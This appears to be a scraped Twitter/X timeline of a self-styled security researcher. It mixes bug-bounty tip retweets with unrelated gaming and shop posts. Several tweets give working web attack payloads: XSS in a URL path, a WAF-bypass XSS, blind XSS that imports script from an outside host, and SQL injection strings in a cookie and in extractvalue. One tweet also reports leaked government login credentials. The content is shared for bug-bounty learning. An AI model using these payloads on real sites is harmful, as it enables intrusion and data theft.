H4ck3r-sU

17 posts

H4ck3r-sU

H4ck3r-sU

@2appstudio

~Cybersecurity researcher and enthusiast~ ~Passionate about protecting the digital world~

Katılım Temmuz 2023
60 Takip Edilen23 Takipçiler
H4ck3r-sU
H4ck3r-sU@2appstudio·
@RadhaSec There was no filter, so we could perform XSS and CSRF attacks. Additionally, there was no rate limit. </p><img src=x onerror=confirm(0)>
English
0
0
0
82
Abhishek Meena 🏵️
Abhishek Meena 🏵️@aacle_·
🚨 Source Code Review 🚨 Functionality Type - Product Review Section • 🛒 A shopping site lets users leave reviews on products. Reviews are displayed on the product page. Identify Vulnerabilities in this code. How would you exploit it? Code Snippet🧑‍💻 :
Abhishek Meena 🏵️ tweet media
English
4
5
26
2.9K
H4ck3r-sU
H4ck3r-sU@2appstudio·
@icimod hello sir/madam i hope you all are good. i am security researcher recently i found a bug on your site. that bug allow to access data management system. if you need more information than contact me thanks. it's very very critical issued. i am tired to mailing you
English
0
0
0
11
H4ck3r-sU retweetledi
Het Mehta
Het Mehta@hetmehtaa·
25 Top Recon Tools For Ethical Hackers / Bug Bounty >Nmap >Maltego >Gau >Subfinder >Dirsearch >Amass >Gobuster >Feroxbuster >Gowitness >Altdns >Rustscan >Waymore >Gospider >NAABU >Masscan >Gotator >FFUF >DnsValidator >WhatWeb >Assetfinder >Censys >Reconftw >Nslookup >Infoga >Builtwith Our Next Bug Bounty & Ethical Hacking Training is starting from mid-March, DM to avail seats.
English
2
67
206
11.8K
H4ck3r-sU retweetledi
RootMoksha Labs
RootMoksha Labs@RootMoksha·
𝗫𝗦𝗦 𝗶𝗻 𝘁𝗵𝗲 .𝗰𝘀𝘀 𝗨𝗥𝗟 𝗽𝗮𝘁𝗵 𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟: "target/lib/css/animated.min.css" 𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻: "/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css" By:@thecybertix #bugbountytips #BugBounty
RootMoksha Labs tweet media
English
2
54
159
5.6K
H4ck3r-sU retweetledi
Mohand Israiwi
Mohand Israiwi@IsrewyMohand·
Found SQL Injection in [org_id] Cookie Payloads for Testing: -1 OR 0=6 AND 0-0=> FALSE -1 OR 6=6 AND 0-0=> TRUE Injected in request like this Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0 #bugbountytip #bugbounty #SQL
Mohand Israiwi tweet media
English
6
76
414
22.4K
H4ck3r-sU retweetledi
Shivam Kumar Singh
Shivam Kumar Singh@MrRajputHacker·
⚠️ A group of hackers is targeting Bharat government websites. Today, they leaked 500k+ ( *.gov.in ) admin/users login credentials, and they are also continuously launching DDoS attacks on Indian government websites. #CyberSecurity #infosecurity #Dataleak
English
11
18
142
24.8K
H4ck3r-sU retweetledi
🇸🇦 Murtada Bin Abdullah (Rood)
Xss is not easy finding 1- Digging for vulnerable endpoint -> 4 Hours 2- Find parameter with param miner 3- Bypass waf -> 30 mins Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)> #bugbounty #bugbountytips
🇸🇦 Murtada Bin Abdullah (Rood) tweet media
English
12
141
796
47.4K
H4ck3r-sU retweetledi
Intigriti
Intigriti@intigriti·
Ever came across an API endpoint like the one below? 🧐️ If you skipped testing these before, you probably missed out on a few IDOR vulnerabilities... 😬️ Here's how 🤑 👇️
Intigriti tweet media
English
3
109
476
46.3K
H4ck3r-sU retweetledi
0xblackbird
0xblackbird@0xblackbird·
Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎 '"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)> AND '"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)> 🥷
0xblackbird tweet media
English
2
98
348
22.1K
H4ck3r-sU
H4ck3r-sU@2appstudio·
@ChatFTW hello i found some bugs how can i submit ? on your ai
English
0
0
0
18
H4ck3r-sU
H4ck3r-sU@2appstudio·
hello
English
0
0
1
50
H4ck3r-sU retweetledi
/Zer0/
/Zer0/@_Zer0Sec_·
Some recent lessons learned: If something is suspicious but SQLMap “thinks” it might/might not be vulnerable, manually confirm/deny before leaving. Payload example: ' AND extractvalue(rand(),concat(0x3a,(SELECT user()))) # #bugbountytips #BugBounty
/Zer0/ tweet media
English
14
153
518
48.7K
ℝ
@realNumberSets·
@Ralpalino @Sleepy4PF @HappyPower @FNChiefAko BR isn't even what this game was "meant" to be. They made a good 4 player PVE game and was looking for a PVP mode to go along with it. One of the original prototypes was basically CTF, never released. They copied the BR fad from games like Pubg and accidentally had a hit.
English
2
0
1
56
Happy Power
Happy Power@HappyPower·
I have a feeling that Chapter 5 is actually going to be decent. We're at a point where they sorta need to release a banger. Let's pray it's good 🙏 Image: @FNChiefAko
Happy Power tweet media
English
44
55
791
62.1K
Qinrun Dai
Qinrun Dai@2st___·
Recently it occurred to me the fact that when I lose my status as a student, I will no longer be a "maybe-good" CTF player or a security researcher. I will still need to fill my knowledge with 7x10 hours of study and enthusiasm like I did during my sophomore year.
English
1
0
2
277
H4ck3r-sU
H4ck3r-sU@2appstudio·
@pgsuk i got a bug on your site how can i report
English
0
0
0
1
PGS
PGS@pgsuk·
There's still time to deliver your Teacher's gifts before the Summer Holidays! ☀️ Order today before 4 pm, selecting the Next Day delivery service 🚚 Shop for last minute Teacher gifts: bit.ly/43rSPob
PGS tweet media
English
1
0
0
51